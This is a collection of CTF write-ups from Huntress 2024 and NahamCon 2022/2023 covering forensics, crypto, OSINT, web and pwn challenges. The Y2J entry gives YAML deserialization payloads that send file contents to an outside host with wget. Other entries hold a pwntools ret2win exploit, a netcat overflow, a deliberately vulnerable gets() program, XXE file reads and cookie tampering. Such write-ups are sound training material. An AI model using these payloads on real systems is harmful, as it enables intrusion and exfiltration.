| ```bash 22 | echo -e "\033[30;40mThis text is invisible\033[0m" 23 | ``` 24 | ![image](https://github.com/user-attachments/assets/241dc688-d046-4133-84f5-f71fd3a0be83) 25 | 26 | 27 | 28 | `flag{b1370ac4fadd8c0237f8771d7d77286a}` 29 | -------------------------------------------------------------------------------- /Huntress-CTF-2024/Warmups/Zulu.md: -------------------------------------------------------------------------------- 1 | # Zulu 2 | 3 | ![image](https://github.com/user-attachments/assets/8587e755-ff3d-48d1-aa5f-26b63b36394d) 4 | 5 | Download: [zulu](https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/refs/heads/main/Huntress-CTF-2024/challenge-files/zulu) 6 | 7 | ## My Solution 8 | 9 | The provided file seems to be a `compress'd data 16 bits` 10 | 11 | ![image](https://github.com/user-attachments/assets/6fe8b098-feef-498e-8f6d-90a5be2388ca) 12 | 13 | A quick google search indicates that this should be a `.z` compressed file: 14 | 15 | ![image](https://github.com/user-attachments/assets/5e614f3f-0ef9-4482-9a2b-510dd9a08a6c) 16 | 17 | Within the stackoverflow post, we can see how to decompress such files as well: 18 | 19 | ![image](https://github.com/user-attachments/assets/13256440-a394-4522-ac40-3a0950361bfd) 20 | 21 | So we rename it accordingly, use `uncompress` command to decompress it and get our flag: 22 | 23 | ```bash 24 | mv zulu zulu.z 25 | uncompress zulu.z 26 | cat zulu 27 | ``` 28 | 29 | `flag{74235a9216ee609538022e6689b4de5c}` 30 | -------------------------------------------------------------------------------- /Huntress-CTF-2024/Web/Plantopia.md: -------------------------------------------------------------------------------- 1 | # Plantopia 2 | 3 | ![image](https://github.com/user-attachments/assets/cc6dd8d7-7100-41f9-b73e-31e8a5b3a114) 4 | 5 | ## My Solution 6 | 7 | We login on the webpage using the provided credentials and notice that the cookie is just a base64 string. 8 | 9 | ![image](https://github.com/user-attachments/assets/1755895a-c2ca-478e-8c27-286f080685a3) 10 | 11 | It consists of the user, 0 and an epoch time. 12 | 13 | As you might imagine, just changing the 0 to a 1 gives us access to the admin panel: 14 | 15 | ![image](https://github.com/user-attachments/assets/0f59389f-3848-4063-9a2e-452fd598be97) 16 | 17 | The app also allows us to see the API endpoints so we know there's a an option to see the logs, to send mail and to update the settings. 18 | 19 | ![image](https://github.com/user-attachments/assets/3e5dc645-9422-47eb-95f8-1da9599b153b) 20 | 21 | We start by updating the settings of the alert to test for command injection: 22 | 23 | ![image](https://github.com/user-attachments/assets/864bff77-70f1-4860-b24f-0cd1d27801ff) 24 | 25 | Then we trigger the sendmail function: 26 | 27 | ![image](https://github.com/user-attachments/assets/26287167-41e9-4efc-9a02-deebe1329290) 28 | 29 | And then check the logs to get our flag: 30 | 31 | ![image](https://github.com/user-attachments/assets/1ffe547a-975f-4640-859d-6ef14e514d8e) 32 | 33 | `flag{c29c4d53fc432f7caeb573a9f6eae6c6}` 34 | -------------------------------------------------------------------------------- /Huntress-CTF-2024/Web/Y2J.md: -------------------------------------------------------------------------------- 1 | # Y2J 2 | 3 | ![image](https://github.com/user-attachments/assets/d16b8f9c-f146-4540-ad18-061143c10f05) 4 | 5 | ## My Solution 6 | 7 | When accessing the page we have only one functionality, to convert Yaml to Json. 8 | 9 | ![image](https://github.com/user-attachments/assets/9ee0f4b2-703e-454d-b41d-82824a3fe52d) 10 | 11 | This is a classic case of python Yaml deserialization. We can get the flag in a number of ways: 12 | 13 | Example 1: 14 | 15 | ```python 16 | !!python/object/apply:os.system 17 | - !!python/str "wget https://lazytitan33.free.beeceptor.com/?f=`cat /flag.txt`" 18 | ``` 19 | 20 | Example 2: 21 | 22 | ```python 23 | !!python/object/apply:posix.system 24 | - wget https://lazytitan33.free.beeceptor.com/?f=`cat /flag.txt` 25 | ``` 26 | 27 | `flag{b20870a1955ac22377045e3b2dcb832a}` 28 | -------------------------------------------------------------------------------- /Huntress-CTF-2024/challenge-files/Challenge.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/Huntress-CTF-2024/challenge-files/Challenge.zip -------------------------------------------------------------------------------- /Huntress-CTF-2024/challenge-files/NTUSER.DAT: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/Huntress-CTF-2024/challenge-files/NTUSER.DAT -------------------------------------------------------------------------------- /Huntress-CTF-2024/challenge-files/Splunk_TA_windows.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/Huntress-CTF-2024/challenge-files/Splunk_TA_windows.zip -------------------------------------------------------------------------------- /Huntress-CTF-2024/challenge-files/ancient.fossil: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/Huntress-CTF-2024/challenge-files/ancient.fossil -------------------------------------------------------------------------------- /Huntress-CTF-2024/challenge-files/app.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/Huntress-CTF-2024/challenge-files/app.zip -------------------------------------------------------------------------------- /Huntress-CTF-2024/challenge-files/babybufov: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/Huntress-CTF-2024/challenge-files/babybufov -------------------------------------------------------------------------------- /Huntress-CTF-2024/challenge-files/babybufov.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | //gcc -fno-pie -no-pie -Wno-implicit-function-declaration -fno-stack-protector -m32 babybufov.c -o babybufov 5 | 6 | void target(){ 7 | puts("Jackpot!"); 8 | char* executable="/bin/bash"; 9 | char* argv[]={executable, NULL}; 10 | execve(executable,argv,NULL); 11 | } 12 | 13 | int vuln(){ 14 | char buf[16]; 15 | gets(buf); 16 | return 0; 17 | } 18 | 19 | int main(){ 20 | setbuf(stdin,NULL); 21 | setbuf(stdout,NULL); 22 | puts("Gimme some data!"); 23 | fflush(stdout); 24 | vuln(); 25 | puts("Failed... :("); 26 | } 27 | 28 | 29 | -------------------------------------------------------------------------------- /Huntress-CTF-2024/challenge-files/based.txt: -------------------------------------------------------------------------------- 1 | 楈繳籁萰杁癣怯蘲詶歴蝕絪敪ꕘ橃鹲𠁢腂𔕃饋𓁯𒁊鹓湵蝱硦楬驪腉繓鵃舱𒅡繃絎罅陰罌繖𔕱蝔浃虄眵虂𒄰𓉋詘襰ꅥ破ꌴ顂𔑫硳蕈訶𒀹饡鵄腦蔷樸𠁺襐浸椱欱蹌ꍣ鱙癅腏葧𔕇鱋鱸𓁮聊聍ꄸꈴ陉𔕁框ꅔ𔕩𔕃驂虪祑𓅁聨朸聣摸眲葮𖠳鵺穭𒁭豍摮饱恕𓉮詔葉鰸葭楷洳面𔕃𔑒踳𔐸杅𐙥湳橹驳陪楴氹橬𓄱蝔晏稸ꄸ防癓ꉁ𖡩鵱聲ꍆ稸鬶魚𓉯艭𔕬輷茳筋𔑭湰𓄲怸艈恧襺陷项譶ꍑ衮汮蹆杗筌蹙怰晘缸睰脹蹃鹬ꕓ脶湏赑魶繡罢𒉁荶腳ꌳ蕔𔐶橊欹𖥇繋赡𐙂饎罒鵡𒉮腙ꍮ楑恤魌虢昹𒅶效楙衎𔕙ꉨ𓈸𔑭樯筶筚絮𓁗浈豱ꉕ魔魧蕕聘筣鹖樫ꍖ汸湖萰腪轪𓉱艱絍笹艨魚詇腁𒁮陴顮虂癁 2 | -------------------------------------------------------------------------------- /Huntress-CTF-2024/challenge-files/calc.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/Huntress-CTF-2024/challenge-files/calc.zip -------------------------------------------------------------------------------- /Huntress-CTF-2024/challenge-files/challenge: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/Huntress-CTF-2024/challenge-files/challenge -------------------------------------------------------------------------------- /Huntress-CTF-2024/challenge-files/challenge-hidden-streams.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/Huntress-CTF-2024/challenge-files/challenge-hidden-streams.zip -------------------------------------------------------------------------------- /Huntress-CTF-2024/challenge-files/challenge-palimpsest.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/Huntress-CTF-2024/challenge-files/challenge-palimpsest.zip -------------------------------------------------------------------------------- /Huntress-CTF-2024/challenge-files/challenge-rustline.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/Huntress-CTF-2024/challenge-files/challenge-rustline.zip -------------------------------------------------------------------------------- /Huntress-CTF-2024/challenge-files/echo_chamber.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/Huntress-CTF-2024/challenge-files/echo_chamber.pcap -------------------------------------------------------------------------------- /Huntress-CTF-2024/challenge-files/eepy.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/Huntress-CTF-2024/challenge-files/eepy.zip -------------------------------------------------------------------------------- /Huntress-CTF-2024/challenge-files/keyboard_junkie: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/Huntress-CTF-2024/challenge-files/keyboard_junkie -------------------------------------------------------------------------------- /Huntress-CTF-2024/challenge-files/little_shop_of_hashes_logs.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/Huntress-CTF-2024/challenge-files/little_shop_of_hashes_logs.zip -------------------------------------------------------------------------------- /Huntress-CTF-2024/challenge-files/logs-parts1-5.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/Huntress-CTF-2024/challenge-files/logs-parts1-5.zip -------------------------------------------------------------------------------- /Huntress-CTF-2024/challenge-files/qrcode.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/Huntress-CTF-2024/challenge-files/qrcode.png -------------------------------------------------------------------------------- /Huntress-CTF-2024/challenge-files/russian_roulette.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/Huntress-CTF-2024/challenge-files/russian_roulette.zip -------------------------------------------------------------------------------- /Huntress-CTF-2024/challenge-files/stack_it.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/Huntress-CTF-2024/challenge-files/stack_it.bin -------------------------------------------------------------------------------- /Huntress-CTF-2024/challenge-files/transmissions.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/Huntress-CTF-2024/challenge-files/transmissions.wav -------------------------------------------------------------------------------- /Huntress-CTF-2024/challenge-files/x-ray.7z: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/Huntress-CTF-2024/challenge-files/x-ray.7z -------------------------------------------------------------------------------- /Huntress-CTF-2024/challenge-files/zulu: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/Huntress-CTF-2024/challenge-files/zulu -------------------------------------------------------------------------------- /Nahamcon-2022/A Wild Ride.md: -------------------------------------------------------------------------------- 1 | ![image](https://user-images.githubusercontent.com/80063008/166223740-61c99cee-1616-4ea9-a880-5df99d6df6fe.png) 2 | 3 | Trying to unzip the file, we are prompted for a password. We can use zip2john to extract the hash and then pass it to john to be cracked. 4 | 5 | `zip2john gpx.zip >hash` 6 | `john hash --wordlist=/usr/share/wordlists/rockyou.txt` 7 | 8 | ![image](https://user-images.githubusercontent.com/80063008/166223937-6e28b0a5-daba-4b25-8ec6-1b4036cc5e88.png) 9 | 10 | After we crack the password we are able to unzip it and we get a lot of .gpx files. 252 to be exact. 11 | 12 | ![image](https://user-images.githubusercontent.com/80063008/166223983-e60380b4-754f-46f1-aee3-2b605e3cf015.png) 13 | 14 | After a bit of research on what this file type is, we come across a website called https://gpx.studio/. We can simply drag and drop all of the files at once and it will process the data from them. 15 | 16 | ![image](https://user-images.githubusercontent.com/80063008/166224066-65b5fd92-e0ec-4ce9-81d0-1ba4c79113db.png) 17 | 18 | Zooming in and out for a bit allows us to see the flag. 19 | 20 | ![image](https://user-images.githubusercontent.com/80063008/166224174-de211a3f-9e21-4971-a0e2-64a927d41321.png) 21 | 22 | flag{gpx_is_cool} 23 | -------------------------------------------------------------------------------- /Nahamcon-2022/Babiersteps.md: -------------------------------------------------------------------------------- 1 | ![image](https://user-images.githubusercontent.com/80063008/166221564-c62ee6ce-bd6e-4a01-99ca-8a2da4bc664c.png) 2 | 3 | Opening the binary in Ghidra we can see that it takes an input buffer of 112 bytes. 4 | 5 | ![image](https://user-images.githubusercontent.com/80063008/166223098-a7658974-9274-4b9c-98ba-97fba7bf1354.png) 6 | 7 | We see it also has a win function. 8 | 9 | ![image](https://user-images.githubusercontent.com/80063008/166223171-8188f335-5a11-40f1-9a9f-aa77a5a1f325.png) 10 | 11 | We can overflow that with 120 As and then return to the win function which executes /bin/sh. Here is the python script for it. 12 | 13 | 14 | ```python 15 | from pwn import * 16 | 17 | target = remote("challenge.nahamcon.com", 31373) 18 | elf = ELF("./babiersteps") 19 | 20 | payload = b"A" * 120 21 | payload += p64(elf.symbols['win']) 22 | 23 | target.send(payload) 24 | target.interactive() 25 | ``` 26 | 27 | ![image](https://user-images.githubusercontent.com/80063008/166223260-e9017084-0768-490d-a16a-2ec28cc78ede.png) 28 | -------------------------------------------------------------------------------- /Nahamcon-2022/Baby RSA Quiz.md: -------------------------------------------------------------------------------- 1 | ![image](https://user-images.githubusercontent.com/80063008/166223338-fe251823-f500-44b5-a98b-435158b68c60.png) 2 | 3 | When connecting to the challenge we see we have some options. 4 | 5 | ![image](https://user-images.githubusercontent.com/80063008/166223379-514c8bf6-5482-40ee-bba2-ccde34d7dff0.png) 6 | 7 | Choosing option 0 gives us a tutorial on RSA cryptography. Choosing option 1 starts the quiz. We first get a short n, e and ct. 8 | 9 | ![image](https://user-images.githubusercontent.com/80063008/166223479-bb50e097-14e3-4d79-a19b-f59dbe25e1af.png) 10 | 11 | We can pass those to [RsaCtfTool](https://github.com/Ganapati/RsaCtfTool) and it will do the work for us. 12 | 13 | `./RsaCtfTool.py -n 124762191422189 -e 65537 --uncipher 64370744219044` 14 | 15 | ![image](https://user-images.githubusercontent.com/80063008/166223577-00d77f08-28c2-4d84-92fa-0726d925d364.png) 16 | 17 | We need to provide the answer in Big Endian. Repeat this two more times and we get the flag. 18 | 19 | ![image](https://user-images.githubusercontent.com/80063008/166223615-ac76ff60-cdea-4fba-9553-63a1927230a7.png) 20 | -------------------------------------------------------------------------------- /Nahamcon-2022/Cereal.md: -------------------------------------------------------------------------------- 1 | ![image](https://user-images.githubusercontent.com/80063008/166224704-210f794b-bf43-4981-9ef6-48a9857f3509.png) 2 | 3 | Runing the file command on this we can see it is an archive. 4 | 5 | ![image](https://user-images.githubusercontent.com/80063008/166225133-2598d379-7f3c-41d5-ad3a-fe987cfc556d.png) 6 | 7 | We unarchive it and get a few other files. The meta.json file contains a lot of data that we don't need to parse through. Doing a file on the .bin files only gives us data which doesn't help. 8 | 9 | ![image](https://user-images.githubusercontent.com/80063008/166225184-3f841175-89e2-4682-9a85-6d5ae3637191.png) 10 | 11 | However if we try to read one of the .bin files, we can see a strange file header. 12 | ![image](https://user-images.githubusercontent.com/80063008/166225361-30784b88-55f3-47e3-bd56-4f85ca007fad.png) 13 | 14 | We can google it and find a software called Logic Analyzer. 15 | ![image](https://user-images.githubusercontent.com/80063008/166225545-9a492aea-63c4-47d8-9010-226ad71e2a9d.png) 16 | 17 | I was lucky to be familiar with this file type as I have encountered it in a past CTF. I already had the software installed so we can go ahead and open the .sal file using [Logic Analyzer](https://www.saleae.com/downloads/) from Saleae. 18 | 19 | ![image](https://user-images.githubusercontent.com/80063008/166225706-fba7cd57-9d31-4f82-a28f-665afefe32e0.png) 20 | 21 | There's a little something extra after the flag which I'll let you discover on your own :)) 22 | 23 | flag{5c4596b35aeb122209b34cccfcdb56c1} 24 | -------------------------------------------------------------------------------- /Nahamcon-2022/Crash Override.md: -------------------------------------------------------------------------------- 1 | ![image](https://user-images.githubusercontent.com/80063008/166219643-55c3b9e8-2cde-4e75-8656-7a6c7b7f9d0d.png) 2 | 3 | We get the source code of the binary that run on the server. 4 | 5 | ![image](https://user-images.githubusercontent.com/80063008/166219799-a147b426-68d2-42b9-9c3f-c471d2d9bfa6.png) 6 | 7 | This takes an input buffer of 2048 bytes and on a segfault it goes to the win function spitting out the flag. We can pass it more than that, for example 2100 A letters using python and can see the flag. 8 | 9 | `python3 -c "print('A' * 2100)"|nc challenge.nahamcon.com 32129` 10 | 11 | ![image](https://user-images.githubusercontent.com/80063008/166219908-77eb78b3-4034-4a73-b9f5-38e1226c0b75.png) 12 | -------------------------------------------------------------------------------- /Nahamcon-2022/EXtravagant.md: -------------------------------------------------------------------------------- 1 | ![image](https://user-images.githubusercontent.com/80063008/166220640-885ce522-4863-42be-b548-be492481e0ef.png) 2 | 3 | The home page looks like this. When I see XML, I immediately think XXE. 4 | 5 | ![image](https://user-images.githubusercontent.com/80063008/166220669-54f5bd9f-6d23-472b-91d8-3b9bbba1b2ab.png) 6 | 7 | On the /trial endpoint we can upload a file. 8 | 9 | ![image](https://user-images.githubusercontent.com/80063008/166220746-b6a9b679-4bb5-43b9-acc3-d03d02408a44.png) 10 | 11 | And on the /view endpoint we can view the file we uploaded. 12 | 13 | ![image](https://user-images.githubusercontent.com/80063008/166220792-6c40e49a-50c3-47b4-8f1f-eeae545a3438.png) 14 | 15 | To make experimentation easier, I intercepted requests using Burpsuite. I first uploaded a standard XXE payload to read a file. 16 | 17 | ![image](https://user-images.githubusercontent.com/80063008/166220858-55272441-120c-45d0-9418-9769ed09cf13.png) 18 | 19 | The request to view the file was successful and we have the passwd file. 20 | 21 | ![image](https://user-images.githubusercontent.com/80063008/166424810-1b1a2d2f-17cf-4b11-935f-ca4ed0f26f2e.png) 22 | 23 | As the description states, the flag is in /var/www so we change our payload to read that file. 24 | 25 | ![image](https://user-images.githubusercontent.com/80063008/166220991-a8abd195-24e5-446f-883d-5cacb8d3bf8e.png) 26 | 27 | And we get the flag. 28 | 29 | ![image](https://user-images.githubusercontent.com/80063008/166221008-e3945ae4-1037-4c3f-8e4b-cee91e369843.png) 30 | -------------------------------------------------------------------------------- /Nahamcon-2022/Jurassic Park.md: -------------------------------------------------------------------------------- 1 | ![image](https://user-images.githubusercontent.com/80063008/166221111-b8138d0f-b89e-4a02-acba-06bbebe46b08.png) 2 | 3 | Interesting looking homepage. 4 | 5 | ![image](https://user-images.githubusercontent.com/80063008/166221159-4c72df02-bcc8-49ae-9e2b-ad47a2cdf0fd.png) 6 | 7 | I usually use Burpsuite to intercept requests when I'm first visiting a website. It automatically looks for usual things like robots.txt which we find here as well. 8 | 9 | ![image](https://user-images.githubusercontent.com/80063008/166221280-3b9eabd4-4877-47e1-9e5e-67a1dacf935e.png) 10 | 11 | Going on the specified endpoint we see a flag.txt file. 12 | 13 | ![image](https://user-images.githubusercontent.com/80063008/166221302-433b1f30-439d-4143-98ca-1cc0c19dfec3.png) 14 | 15 | Which we can read and get the flag. 16 | 17 | ![image](https://user-images.githubusercontent.com/80063008/166221325-81dcadcc-17cd-4c33-afb7-58451019fe33.png) 18 | -------------------------------------------------------------------------------- /Nahamcon-2022/Mobilize.md: -------------------------------------------------------------------------------- 1 | ![image](https://user-images.githubusercontent.com/80063008/166224279-85ebc6d2-611a-4078-9be5-2190141efc45.png) 2 | 3 | To decompile the apk file we can use a tool call jadx. 4 | 5 | `sudo apt install jadx` 6 | `jadx -d /tmp/decompiled_folder /tmp/mobilize.apk` 7 | 8 | We can do a recursive grep search and we quickly find the flag: 9 | 10 | `grep -Rn "flag{.*}"` 11 | 12 | ![image](https://user-images.githubusercontent.com/80063008/166224542-862b4d90-6c8f-4198-877b-b0180b24ea46.png) 13 | 14 | It is in /resources/res/values/strings.xml 15 | 16 | ![image](https://user-images.githubusercontent.com/80063008/166224597-29732781-469b-498c-92ff-854b5de64214.png) 17 | -------------------------------------------------------------------------------- /Nahamcon-2022/Quirky.md: -------------------------------------------------------------------------------- 1 | ![image](https://user-images.githubusercontent.com/80063008/166220014-01c95cab-cc2d-4c2e-9882-fff645883735.png) 2 | 3 | Reading the file we are given, we see a bunch of hex. 4 | 5 | ![image](https://user-images.githubusercontent.com/80063008/166220052-fd8c4168-edaf-434e-9d0c-1554c16b0a03.png) 6 | 7 | We can use sed to remove the \x so we can use xxd in the terminal to convert the hex. 8 | 9 | `cat quirky|sed 's/\\x//g'|xxd -r -p` 10 | 11 | Based on the file header, we can tell this is supposed to be a PNG file. 12 | 13 | ![image](https://user-images.githubusercontent.com/80063008/166220232-0bf49fa6-de76-40d8-89d2-58bf1101a59a.png) 14 | 15 | Redirecting that output to a file, we can see it's a QR code. 16 | 17 | ![image](https://user-images.githubusercontent.com/80063008/166220554-13d58a02-f262-4069-8fbf-f1cb14ed299b.png) 18 | 19 | 20 | We can decode QR codes directly in the terminal using zbarimg. So putting it all together, we can use a bash onliner to get the flag. 21 | 22 | `cat quirky|sed 's/\\x//g'|xxd -r -p > pic.png|zbarimg -q pic.png|awk -F ":" '{print $2}'` 23 | 24 | ![image](https://user-images.githubusercontent.com/80063008/166220479-96f3adc7-203d-4c78-a263-de8cf854f1c0.png) 25 | -------------------------------------------------------------------------------- /Nahamcon-2022/Steamy Locomotive.md: -------------------------------------------------------------------------------- 1 | ![image](https://user-images.githubusercontent.com/80063008/166219202-034f004e-ddb7-4046-9c99-5faff50a4ce7.png) 2 | 3 | When we log in we get an animation of a locomotive crossing the screen. 4 | 5 | ![image](https://user-images.githubusercontent.com/80063008/166219241-34c3acba-d35d-4e46-a34e-d3724021d2c0.png) 6 | 7 | And when it's off the screen, it closes: 8 | 9 | ![image](https://user-images.githubusercontent.com/80063008/166219266-d1a6040a-e0ee-47ad-8064-2a7aa78b122a.png) 10 | 11 | If we try to pass commands to it before the train comes in, we see that we have command execution. 12 | 13 | ![image](https://user-images.githubusercontent.com/80063008/166219486-73b13274-dfdc-477a-a9a9-7b27a60a0515.png) 14 | 15 | So we can read the flag now. 16 | 17 | ![image](https://user-images.githubusercontent.com/80063008/166219413-f2040185-8fb8-4835-aa1e-00cebac9e656.png) 18 | -------------------------------------------------------------------------------- /Nahamcon-2022/The Balloon.md: -------------------------------------------------------------------------------- 1 | ![image](https://user-images.githubusercontent.com/80063008/166218504-93323106-89e3-4cf9-b33e-b35eed252209.png) 2 | 3 | After we download the file, we can read it and see a potential link in it. 4 | 5 | ![image](https://user-images.githubusercontent.com/80063008/166218543-ab1fd4b6-d3f0-4ee1-beaa-570e62463799.png) 6 | 7 | It seems to be rotated and after some experimentation, we can see that if we use caesar to rotate it 11 times, we get a proper link. 8 | 9 | `cat theballoon|caesar 11` 10 | 11 | ![image](https://user-images.githubusercontent.com/80063008/166218614-57fe8ba7-faba-4105-a573-1f886b1a2d2f.png) 12 | 13 | We can curl that down and see a strange string. 14 | 15 | `curl https://pastebin.com/eLBePZEy` 16 | 17 | ![image](https://user-images.githubusercontent.com/80063008/166218694-f19da111-c9d5-4866-aa70-6ff641b68bf1.png) 18 | 19 | It took me a while to figure out what this string is since it's not something I saw often until now. However the repeated mentions of the word 'inflate' made me experiment with Cyberchef and found that using raw inflate gets us the flag. 20 | 21 | ![image](https://user-images.githubusercontent.com/80063008/166218885-54272117-4285-4974-93e2-fad4fd4b2a02.png) 22 | -------------------------------------------------------------------------------- /Nahamcon-2023/Forensics/Fetch.md: -------------------------------------------------------------------------------- 1 | # Fetch 2 | 3 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/81f3d65d-ec8d-4e40-b01b-31deadfd6508) 4 | 5 | For this challenge we get a file I haven't seen before. A Windows imaging image: 6 | 7 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/876185c6-113f-4bb2-9244-07c925fa495d) 8 | 9 | After some research with Google, we find that there are tools we can use to parse these in Linux and in Windows. Initially I install `wimtools`. 10 | 11 | ```bash 12 | sudo apt-get install wimtools 13 | ``` 14 | After that I mounted it to a folder and found a bunch of prefetch files: 15 | 16 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/2e676c67-295f-4fad-9bd7-332e957c137e) 17 | 18 | I read some articles trying to find some easy ways of parsing the information in these files as there were quite a few, a real "needle in a haystack" situation. 19 | 20 | https://www.hackingarticles.in/forensic-investigation-prefetch-file/ 21 | 22 | Eventually I found this Windows tool as it was easier for me to have a GUI in this instance: 23 | https://www.nirsoft.net/utils/win_prefetch_view.html 24 | 25 | My aim was to look into the prefetch files of stuff that had user input like, notepad, cmd, powershell and eventually I found wordpad: 26 | 27 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/a6a290f1-a776-4c5e-9101-2ac88c297995) 28 | 29 | I used cyberchef to quickly convert it to lowercase: 30 | 31 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/f8c11c07-5aa0-481b-8ce2-d21765726706) 32 | 33 | flag{97f33c9783c21df85d79d613b0b258bd} 34 | -------------------------------------------------------------------------------- /Nahamcon-2023/Forensics/Perfectly_Disinfected.md: -------------------------------------------------------------------------------- 1 | # Perfectly Disinfected 2 | 3 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/0e59b99d-dfec-4fb3-9ecd-1da1e1bcd74e) 4 | 5 | This was a very easy one for me as I already had a tool installed that's very good in finding hidden stuff in PDFs. I've used [PDFStreamDumper](https://pdfstreamdumper.software.informer.com/) before in other CTFs and it found the flag for me right away in the first item in the list, in the Title: 6 | 7 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/6ed1fdda-b590-46d7-8e95-0a21320badda) 8 | 9 | flag{b00acdc78749b378f8f4889f8243789304abe928} 10 | -------------------------------------------------------------------------------- /Nahamcon-2023/Geosint.md: -------------------------------------------------------------------------------- 1 | # Chall1 2 | 3 | We are in Singha Park Khon Kaen Golf Club in Thailand. 4 | 5 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/c2c17820-fbc3-4831-8e77-6cffae308540) 6 | 7 | # Chall2 8 | 9 | We are in Portoferraio, Province of Livorno, Italy. 10 | 11 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/07d0d080-6607-4c71-8d2a-810254e74df7) 12 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/5bddc0a3-543d-4b1c-933b-f02087d9a92f) 13 | 14 | # Chall3 15 | 16 | We are in Central Park, New York, on the Sheep Maeadow lawn. 17 | 18 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/3c91490c-afa3-475e-99ed-74807beac557) 19 | 20 | # CHall 4 21 | 22 | We are in Ebenfurth train station, Austria. 23 | 24 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/a09484fe-b5b9-4594-8976-e04238ed9ea8) 25 | -------------------------------------------------------------------------------- /Nahamcon-2023/Misc/Zombie.md: -------------------------------------------------------------------------------- 1 | # Zombie 2 | 3 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/d0349306-c955-42cc-ab42-38c618235a16) 4 | 5 | This challenge allows us to SSH into a box and we see a script that we can read to better understand what is going on: 6 | 7 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/7a67c836-0bcd-4302-97c7-682939102ae7) 8 | 9 | It seems the user runs tail on the flag and then deletes it. However, the process is still running in the background: 10 | 11 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/0eb141b1-7ff5-4a8a-b732-6f776a2d7a3b) 12 | 13 | Which means we should be able to read its file descriptor by going to `/proc//fd`. 14 | 15 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/722f45e8-32d7-489f-a903-bce368c4c885) 16 | 17 | And indeed, we get the flag: 18 | 19 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/9b9d1058-380a-4f47-a1a8-c6bf0b110680) 20 | 21 | flag{6387e800943b0b468c2622ff858bf744} 22 | -------------------------------------------------------------------------------- /Nahamcon-2023/README.md: -------------------------------------------------------------------------------- 1 | This was another very fun Nahamcon CTF. I finished 98th as a one-man show/team. That's top 3.88% of the teams. 2 | 3 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/c1abce45-2196-421e-a2dd-f2b43afe6cf5) 4 | -------------------------------------------------------------------------------- /Nahamcon-2023/Warmups/Glasses.md: -------------------------------------------------------------------------------- 1 | # Glasses 2 